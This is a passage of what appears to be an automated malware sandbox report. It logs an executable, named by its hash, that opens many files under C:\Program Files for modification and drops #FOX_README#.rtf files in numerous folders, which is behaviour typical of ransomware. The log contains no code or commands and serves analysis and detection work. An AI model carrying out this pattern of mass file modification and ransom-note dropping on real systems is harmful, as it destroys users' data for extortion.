modification C:\Program Files\Java\jre7\lib\zi\America\Inuvik f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\LICENSE f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\release f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vincennes f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\SyncConvertTo.TTS f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\da.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Mendoza f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\klist.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\skins\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Choibalsan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tehran f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfxrt.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Marquesas f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\jp2launcher.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\COPYRIGHT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Casey f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Moscow f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\psfontj2d.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Scoresbysund f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Noumea f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ko.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Cairo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hovd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Port_Moresby f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Athens f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_TW.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Currie f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fi.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_es.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Knox f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Saipan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Araguaina f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2launcher.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Riga f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\sa-jdi.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\net.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wallis f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\browser\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\uk.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-4 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\La_Paz f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jinfo.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator_3.3.300.v20140518-1928.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\ReadPublish.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Copenhagen f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\ImportCheckpoint.ppt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thunder_Bay f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\servertool.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fr.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pt-BR.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\LICENSE f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\New_Salem f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Phoenix f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\ProtectConfirm.tif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javafx.policy f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mazatlan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program 